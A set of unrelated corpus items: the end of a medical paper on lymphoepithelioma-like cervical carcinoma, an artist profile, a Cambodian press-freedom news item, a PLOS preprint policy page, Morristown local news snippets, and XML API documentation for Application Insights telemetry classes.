defined islands of undifferentiated cells in a background intensely infiltrated by lymphocytes. The tumor cells have uniform, vesicular nuclei with prominent nucleoli and moderate amounts of slightly eosinophilic cytoplasm. The cell borders are indistinct, often imparting a syncytial-like appearance to the groups. This typical microscopic appearance and immunohistochemistry for epithelial and lymphoid markers can help in differentiating cervical LELC from the poorly differentiated squamous cell carcinoma and lymphoproliferative lesions. In the female genital tract, LELC has been reported in the vulva, vagina, uterine cervix, and endometrium \[[@B9-medicina-55-00780]\]. When LELC affects the cervix, it is believed to have a better prognosis than the normal SCC of the cervix due to lack of lymph node metastasis \[[@B3-medicina-55-00780],[@B10-medicina-55-00780]\]. Significant differences in the incidence of this type of carcinoma in Asian and Caucasian races have been reported. It represents 0.7% of all primary cervical malignancies among the Western population and is about 5.5% among the Asian population \[[@B3-medicina-55-00780]\]. There is also a difference in the mean age of diagnosis in these patients. In Asian patients it is reported to be between 43 and 50 years (range 30--72) and mean age of 42.3 years in Western patients (range 21--58) \[[@B11-medicina-55-00780]\]. It is assumed that LELC is associated with Epstein--Barr virus (EBV) infection in Asians, whereas Westerns are associated with human papillomavirus (HPV), or viral genesis cannot be proven \[[@B3-medicina-55-00780],[@B12-medicina-55-00780],[@B13-medicina-55-00780]\]. Typically, the diagnosis is made at an early stage and there is no involvement of the lymph nodes. This could be the reason for better prognosis reporting for this disease \[[@B11-medicina-55-00780]\]. In our study, we presented 17 cases with LELC of uterine cervix, which represented 3.3% from all stage I cases with cervical carcinoma during the study period. This rate was four times greater than the literature results. This frequency can be explained by the fact that only those patients who were FIGO I stage and were directly referred to surgery were included in this study. All other cases of cervical cancer were excluded. However, we believe that it is quite possible that the incidence of LELC in Western patients is higher than reported, as it is determined on the basis of case reports and small case series. The mean age in our group was 49.6 (ranging from 32 to 67), which was slightly higher than the published data so far, although Martorell et al. found that the mean age of their patients was 69 years \[[@B11-medicina-55-00780]\]. In our study, only three patients (17.6%) were diagnosed with a tumor larger than 4 cm in diameter, confirming the data from the world literature that LELC is diagnosed early. However, the fact that in nine cases the tumor size was between 2 and 4 cm indicates that the diagnosis was not performed at an early stage. This could be due to the health culture of the population and problems with the coverage of the screening program. All patients had a history of abnormal genital and contact bleeding for at least one year. In two of the patients that died, lymph metastases were observed. The rapid progression of the disease, which could be explained by its possible hematogenic dissemination, was noticeable. In all four patients that died, the tumor was less than 4 cm, in two cases it was less than 2 cm, and in two cases it was between 2 and 4 cm. There was no relationship between the size of the tumor and its prognosis. There was a trend in lower OS in the metastatic lymph node group, which did not reach statistical significance. This could be explained with the small number of patients in the study. 5. Conclusions {#sec5-medicina-55-00780} ============== Lymphoepithelioma-like carcinoma is a rare SCC subtype, but it may be more frequent among western patients than previously thought. Our results do not confirm the data showing low risk of lymph metastasis and good prognosis of LELC, which is why we think that the treatment in these cases has to be more aggressive than is reported in the literature. Due to the low incidence of this disease, a lot is still unknown. Larger studies in the area are needed. Conceptualization, A.Y. and A.K.; Methodology, A.K. and A.Y.; Formal Analysis, A.K. and S.S.; Investigation, A.Y.; Resources, M.V.-S.; Data Curation, S.S. and M.K. (Martin Karamanliev); Writing---Original and Draft Preparation, A.Y. and M.K. (Martin Karamanliev); Writing---Review and Editing, A.Y. and M.K. (Milena Karcheva); Visualization, M.K. (Milena Karcheva); Supervision A.Y. and M.V.-S. This research received no external funding The authors declare no competing interests. ![Comparing the OS between the non-metastatic lymph node group and metastatic lymph node group.](medicina-55-00780-g001){#medicina-55-00780-f001} ![Comparing the OS in groups with different size of the tumor.](medicina-55-00780-g002){#medicina-55-00780-f002} medicina-55-00780-t001_Table 1 ###### Clinical and pathoanatomical characteristics of the patients. Case Age Treatment Clinical Stage Tumor Size (cm) Recurrence Outcome ------ ----- ----------- ---------------- ----------------- ------------------ ---------------------- 1 67 RH + PLND pT1b1pN1Mo b/n 2--4 Unknown Died on 8th month 2 58 RH + PLND pT1b1pNoMo \<2 Liver metastases Died on 88th month 3 42 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on128th month 4 47 RH + PLND pT1b2pN1Mo \>4 No Alive on 128th month 5 48 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on 104th month 6 38 RH + PLND T1b1pNoMo \<2 No Alive on 127th month 7 46 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on 116th month 8 59 TH pT1b2NoMo \>4 No Alive on 103th month 9 49 RH + PLND pT1bpNoMo \<2 No Alive on 102th month 10 59 RH + PLND pT1b1pNoMo b/n 2--4 Bone metastases Died on 18th month 11 40 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on 92th month 12 49 RH + PLND pT1b1pN1Mo b/n 2--4 Unknown Died on 16th month 13 34 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on 68th month 14 66 RH + PLND pT1b2pNoMo \>4 No Alive on 52th month 15 61 RH + PLND pT1b1pNoMo b/n 2--4 No Alive on 44th month 16 48 RH + PLND pT1b1pNoMo \<2 No Alive on 43th month 17 32 RH + PLND T1b1pNoMo \<2 No Alive on 28th month RH---radical hysterectomy; TH---total hysterectomy; PLND---pelvic lymph node dissection.
{ "pile_set_name": "PubMed Central" }
Share Robert Hardgrave is both a visual artist and a City Superhero Our biweekly City Superheroes column highlights the powerful figures walking among us — with the help of a (usually local) illustrator. This week’s pairing: painter Robert Hardgrave and visual artist Poster Bot. Moniker: Splash Given Name: Robert Hardgrave Other Aliases: Farmer Bob Superpowers: Can manipulate paint from his paint can into any shape, form or substance on the planet. First Appearance: Hardgrave started showing his work at Seattle’s Bemis Building in 2004. There, he shared paintings, drawings and his “transplant dolls” —he’d recently had a kidney transplant and saved some of the pants he wore in the hospital during that ordeal. He took toys from thrift stores and cut the pants apart and sewed them onto the toy forms to make the transplant dolls. Local Haunts: The Varsity Inn on N. 34th and Wallingford. Archenemies: “I think there should be a place for homeless people to get cleaned up.” Even Heroes Have Heroes: Jeffry Mitchell, Fernand Léger, Sally Smart What Small Object Holds Great Meaning: “My sketchbook. I take it with me everywhere I go so I can draw if I need to. It keeps me occupied. I got my first one years and years and years ago. I usually buy the ones that have the grid paper – composition books.” Origin Story: Born in Oxnard, Calif., where he lived until he was 10 years old, Hardgrave and his family later moved to Arizona, where he spent most of his teenage years. In 1992, he “sold everything” and rode a motorcycle to Seattle, where he worked odd jobs, including busing tables, and drew “a lot.” Hardgrave’s art developed as he spent time on his own hanging out in his room and “working at it.” Hardgrave says he always is having breakthroughs. One such breakthrough came when he combined paints to form a particular mixture that he quickly learned he could mold, shape, transform and manipulate into any color, size, shape or object on earth. The recipe for the paint’s magical composition is stored safely in his mind. He uses this paint concoction to fight against evil. These days, though, it is a particularly good time to be an artist in Seattle, Hardgrave says, adding that the city’s art scene “seems to be really thriving.” His Philosophy: “Make the best work you can. But, at the same time, you never make the best work you can because you’re always thinking of something you can do better and then you make the next piece and the next piece. You make the best work you can at that time but you can always do better.” What’s Next: Hardgrave will be showing some new work (including pieces made from cardboard) at the “Good Neighbor Gallery” on Capitol Hill, Aug. 22nd. About the Illustrator: Poster Bot is a Seattle-based writer and illustrator. He may be quoted as saying, "The best thing anyone can give to the world is their own view of it." His point of view, he says, “is often intense, at times insane ... possibly even wrong, but nonetheless valid.”
{ "pile_set_name": "Pile-CC" }
Khmer Morning News More radio Court Calls in Another Editor for Questions A second opposition newspaper editor was issued a subpoena Wednesday, to answer questions on a number of criminal charges, just one week after the jailing of his colleague. The subpoena calls for Dam Sith, editor of Moneaksekar Khmer, to appear in court July 14, for questioning in a government lawsuit for defamation, insult, disinformation, incitement and a “breaking of solidarity.” Dam Sith was briefly jailed in a lawsuit brought by Foreign Minister Hor Namhong last year, after publishing remarks by opposition leader Sam Rainsy implicating the minister in the Khmer Rouge. Dam Sith told VOA Khmer Wednesday he received the summons June 29. “Until this time, I did not know that government sued me for any articles, and I am looking for lawyer to defend my case,” he said. Long Dara, a government lawyer, said Dam Sith was being sued for 18 articles written between February and May, “published to incite a conflict among senior government officials without fact.” The articles were over the appointment of Gen. Pol Saroeun to commander-in-chief of the Royal Cambodian Armed Forces, as he replaced Gen. Ke Kim Yan. “We have much evidence to sue Dam Sith in these cases,” Long Dara said. “These articles attacked the government and incited to have conflict and a break-up of internal government solidarity,” he said. “In the lawsuit, we site penal charges relating to articles 60, 61, 62, and 63 in the 1992 penal code.” The case comes in the wake of a yearlong prison sentence for another opposition journalist. Hang Chakra, chief of the Khmer Mchas Srok newspaper, was imprisoned and fined after publishing reports in April and May that implicated Council Minister Sok An in corrupt practices. “I would like to call for the court to seriously investigate and to request the court use the media law to sentence or to have a hearing for Dam Sith’s case,” Um Sarin, president of the Cambodian Association for Protection of Journalists, said Wednesday.
{ "pile_set_name": "Pile-CC" }
PLOS and bioRxiv PLOS partners with bioRxiv to make posting life sciences preprints easy and convenient. Authors posting preprints to the bioRxiv preprint server may choose to concurrently submit their manuscripts to PLOS journals through the bioRxiv direct transfer service. Authors submitting manuscripts in the life sciences to PLOS Neglected Tropical Diseases may opt-in to post their work on bioRxiv during thePLOS Neglected Tropical Diseases initial submission process. Preparing Preprint Files for Submission Preprints appear on bioRxiv in PDF format. Authors can choose to supply their own preprint PDF or use an automatically generated PDF. Author-supplied PDFs If you supply a preprint PDF it will appear on bioRxiv exactly as it is. Be sure to include title, authors, abstract, and the full text of the manuscript, along with any figures or tables, and their captions. bioRxiv limits PDF file size to 20 MB or less. Be sure to compress your PDF to meet this requirement. Automatically generated PDFs PLOS Neglected Tropical Diseases can automatically compile a preprint PDF suitable for bioRxiv from the manuscript file and figure files that are part of your regular journal submission. Supplementary information will not be included in auto-generated preprints, but may be uploaded directly to bioRxiv after posting. Note that some figure quality may be lost during the auto-conversion process. For best results, make sure that your submission materials meet journal formatting requirements, and that tables fit within the margins of the page. If you are concerned about figure resolution, consider supplying a preprint PDF alongside your other submission files. Editorial Assessment PLOS encourages editors to consider comments and feedback available on the preprint record to inform their editorial decision, and where relevant, editors may incorporate those comments in their editorial feedback to authors. Updates to Preprints Once a manuscript has been posted as a preprint on bioRxiv, authors may submit updates or revisions on bioRxiv directly. Consult the bioRxiv submit page for specific instructions. Linking Preprints to Published Papers If a manuscript with a concurrent bioRxiv preprint is accepted for publication in PLOS Neglected Tropical Diseases, the preprint and published article will link to each other when the article appears online. Concerns If a concern arises about a published PLOS article with a related bioRxiv preprint, PLOS will evaluate the concern according to our standard editorial processes, taking into account any relevant comments available on the bioRxiv preprint.
{ "pile_set_name": "Pile-CC" }
MORRISTOWN – Santa Claus is coming to town when he arrives after 5 p.m. on the roof of the Century 21 Department Store on North Park Place Sunday, Nov. 25 to kick off the Christmas Festival at the Morristown Green. MORRISTOWN — Delbarton is already battle-tested for the 2018 season. That’s because many positions were wide open in the preseason, waiting to be filled by players trying to make a name for themselves. As we celebrate Thanksgiving this week, we can take stock of our many blessings as a country. Despite painful political polarization, things are good in the country for the vast majority of Americans. And for many non-Americans as well. Harvard political scientist, Maya Sen, and her colleague, Adam Glynn, a professor of government, are reportedly stunned by their findings that male judges, with daughters, particularly those appointed by Republican presidents, curiously enough, are more likely to vote in favor of women’s rig… James Nicholas “Jimmy” Sumas, a beloved husband, father, grandfather, brother and friend devoted to his loving family and extended work family at Village Super Market, Inc., the company he led for most of his life, died peacefully on Saturday, July 7, 2018, in his hometown of Morristown. He was 84. CHATHAM TWP. – The Art League of the Chathams will celebrate the opening of its 30th anniversary Winter Exhibit with a reception, a boutique, and a solo show by Chatham artist Betsy Mirabelli from 2 to 4 p.m. Sunday, Dec. 9, at the Chatham Township Municipal Building at 58 Meyersville Road. Step back in time and experience the holidays as they were celebrated during the Civil war when Historic Speedwell, 333 Speedwell Ave., Morristown, hosts "Winter on the Home Front: The Civil War" from noon to 5 p.m. Saturday, Dec. 1 and noon to 4 p.m. Sunday, Dec. 2.
{ "pile_set_name": "Pile-CC" }
<?xml version="1.0"?> <doc xml:lang="en"> <assembly> <name>Microsoft.AI.WindowsServer</name> </assembly> <members> <member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer"> <summary> A telemetry initializer that will gather Azure Web App Role Environment context information. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppNameEnvironmentVariable"> <summary>Azure Web App name corresponding to the resource name.</summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppHostNameEnvironmentVariable"> <summary>Azure Web App Hostname. This will include the deployment slot, but will be same across instances of same slot.</summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer" /> class. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)"> <summary> Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context. </summary> <param name="telemetry">The telemetry to initialize.</param> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer"> <summary> A telemetry initializer that will gather Azure Role Environment context information. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer" /> class. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)"> <summary> Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context. </summary> <param name="telemetry">The telemetry to initialize.</param> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer"> <summary> A telemetry context initializer that will set component context version on the base of BuildInfo.config information. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.version"> <summary> The version for this component. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)"> <summary> Initializes version of the telemetry item with the version obtained from build info if it is available. </summary> <param name="telemetry">The telemetry context to initialize.</param> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.LoadBuildInfoConfig"> <summary> Loads BuildInfo.config and returns XElement. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.GetVersion"> <summary> Gets the version for the current application. If the version cannot be found, we will return the passed in default. </summary> <returns>The extracted data.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule"> <summary> Telemetry module that sets developer mode to true when is not already set AND managed debugger is attached. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.IsDebuggerAttached"> <summary> Function that checks whether debugger is attached with implementation that can be replaced by unit test code. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)"> <summary> Gives the opportunity for this telemetry module to initialize configuration object that is passed to it. </summary> <param name="configuration">Configuration object.</param> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer"> <summary> A telemetry context initializer that will gather device context information. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)"> <summary> Populates device properties on a telemetry item. </summary> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer"> <summary> Obsolete. A telemetry context initializer that used to populate role instance name. Preserved for backward compatibility. Note that role instance will still be populated with the machine name as in the previous versions. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)"> <summary> Obsolete method. </summary> <param name="telemetry">The telemetry to initialize.</param> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.instance"> <summary> The singleton instance for our reader. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleName"> <summary> The Azure role name (if any). </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleInstanceName"> <summary> The Azure role instance name (if any). </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader"/> class. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Instance"> <summary> Gets or sets the singleton instance for our application context reader. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.BaseDirectory"> <summary> Gets or sets the base directly where hunting for application DLLs is to start. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Initialize"> <summary> Initializes the current reader with respect to its environment. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleName"> <summary> Gets the Azure role name. </summary> <returns>The extracted data.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleInstanceName"> <summary> Gets the Azure role instance name. </summary> <returns>The extracted data.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader"> <summary> The reader is platform specific and applies to .NET applications only. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.Instance"> <summary> Gets or sets the singleton instance for our application context reader. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetHostSystemLocale"> <summary> Gets the host system locale. </summary> <returns>The discovered locale.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceType"> <summary> Gets the type of the device. </summary> <returns>The type for this device as a hard-coded string.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceUniqueId"> <summary> Gets the device unique ID, or uses the fallback if none is available due to application configuration. </summary> <returns> The discovered device identifier. </returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetOemName"> <summary> Gets the device OEM. </summary> <returns>The discovered OEM.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceModel"> <summary> Gets the device model. </summary> <returns>The discovered device model.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetNetworkType"> <summary> Gets the network type. </summary> <returns>The discovered network type.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.RunWmiQuery(System.String,System.String,System.String)"> <summary> Runs a single WMI query for a property. </summary> <param name="table">The table.</param> <param name="property">The property.</param> <param name="defaultValue">The default value of the property if WMI fails.</param> <returns>The value if found, Unknown otherwise.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader"> <summary> The user context reader interface used while reading user related information in a platform specific way. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.Initialize"> <summary> Initializes the current reader with respect to its environment. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleName"> <summary> Gets the Azure role name. </summary> <returns>The extracted data.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleInstanceName"> <summary> Gets the Azure role instance name. </summary> <returns>The extracted data.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role"> <summary> Represents a role that is defined as part of a hosted service. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.#ctor(System.Object)"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role"/> class. </summary> <param name="targetObject">The target object.</param> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.Name"> <summary> Gets the name of the role as it is declared in the service definition file. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.GetTargetObjectInstance(System.Type,System.Object[])"> <summary> Gets the target object instance. </summary> <param name="targetType">Type of the target.</param> <param name="activationArgs">The activation arguments.</param> <returns> The activated instance is one is required. </returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment"> <summary> Provides information about the configuration, endpoints, and status of running role instances. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment"/> class. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.IsAvailable"> <summary> Gets a value indicating whether the role instance is running in the Windows Azure environment. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.DeploymentId"> <summary> Gets the unique identifier of the deployment in which the role instance is running. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.CurrentRoleInstance"> <summary> Gets a RoleInstance object that represents the role instance in which the code is currently running. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.GetTargetObjectInstance(System.Type,System.Object[])"> <summary> Gets the target object instance. </summary> <param name="targetType">Type of the target.</param> <param name="activationArgs">The activation arguments.</param> <returns> The activated instance is one is required. </returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance"> <summary> Represents an instance of a role. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.#ctor(System.Object)"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance"/> class. </summary> <param name="targetObject">The target object.</param> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Id"> <summary> Gets the instance identifier (ID) of the role instance. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Role"> <summary> Gets the Role object that is associated with the role instance. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.GetTargetObjectInstance(System.Type,System.Object[])"> <summary> Gets the target object instance. </summary> <param name="targetType">Type of the target.</param> <param name="activationArgs">The activation arguments.</param> <returns> The activated instance is one is required. </returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject"> <summary> A runtime bound object for a given .NET type. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetType"> <summary> The target type for our object. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetObject"> <summary> The target object. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.#ctor(System.Type,System.Object[])"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject"/> class. </summary> <param name="targetType">Type of the target.</param> <param name="activationArgs">The activation arguments.</param> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetType"> <summary> Gets or sets the type of the target. </summary> </member> <member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetObject"> <summary> Gets or sets the target object. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetTargetObjectInstance(System.Type,System.Object[])"> <summary> Gets the target object instance. </summary> <param name="targetType">Type of the target.</param> <param name="activationArgs">The activation arguments.</param> <returns>The activated instance is one is required.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Object[])"> <summary> Gets the property. </summary> <param name="name">The name.</param> <param name="args">The arguments.</param> <returns>The value for our property.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Type[],System.Object[])"> <summary> Gets the property. </summary> <param name="name">The name.</param> <param name="parameterTypes">The parameter types.</param> <param name="args">The arguments.</param> <returns>The value for our property.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Reflection.BindingFlags,System.Type[],System.Object[])"> <summary> Gets the property. </summary> <param name="name">The name.</param> <param name="bindingFlags">The binding flags.</param> <param name="parameterTypes">The parameter types.</param> <param name="args">The arguments.</param> <returns>The value for our property.</returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.InvokeHelper(System.String,System.Reflection.BindingFlags,System.Object[],System.Globalization.CultureInfo)"> <summary> Invocation helper for calling any member on our target object. </summary> <param name="name">The name.</param> <param name="bindingFlags">The binding flags.</param> <param name="args">The arguments.</param> <param name="culture">The culture.</param> <returns>The return value for our invocation.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime"> <summary> The wrapper for the Azure Service Runtime. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime.GetRoleEnvironment(System.String)"> <summary> Gets the role environment. </summary> <param name="baseDirectory">The base directory.</param> <returns> The role environment object. </returns> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.TypeHelpers.GetLoadedType(System.String,System.String)"> <summary> Gets the type by type name from the assembly. </summary> <param name="typeName">The type name.</param> <param name="assemblyName">The assembly name.</param> <returns>Return type from assembly loaded in the process by assembly and type name.</returns> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource"> <summary> ETW EventSource tracing class. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Log"> <summary> Instance of the WindowsServerEventSource class. </summary> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords"> <summary> Keywords for the PlatformEventSource. Those keywords should match keywords in Core. </summary> </member> <member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords.UserActionable"> <summary> Key word for user actionable events. </summary> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule"> <summary> The module subscribed to AppDomain.CurrentDomain.UnhandledException to send exceptions to ApplicationInsights. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule"/> class. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)"> <summary> Initializes the telemetry module. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnhandledExceptionTelemetryModule.Dispose"> <summary> Disposing UnhandledExceptionTelemetryModule instance. </summary> </member> <member name="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule"> <summary> The module subscribed to TaskScheduler.UnobservedTaskException to send exceptions to ApplicationInsights. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.#ctor"> <summary> Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule" /> class. </summary> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)"> <summary> Initializes the telemetry module. </summary> <param name="configuration">Telemetry Configuration used for creating TelemetryClient for sending exceptions to ApplicationInsights.</param> </member> <member name="M:Microsoft.ApplicationInsights.WindowsServer.UnobservedExceptionTelemetryModule.Dispose"> <summary> Disposing TaskSchedulerOnUnobservedTaskException instance. </summary> </member> </members> </doc>
{ "pile_set_name": "Github" }
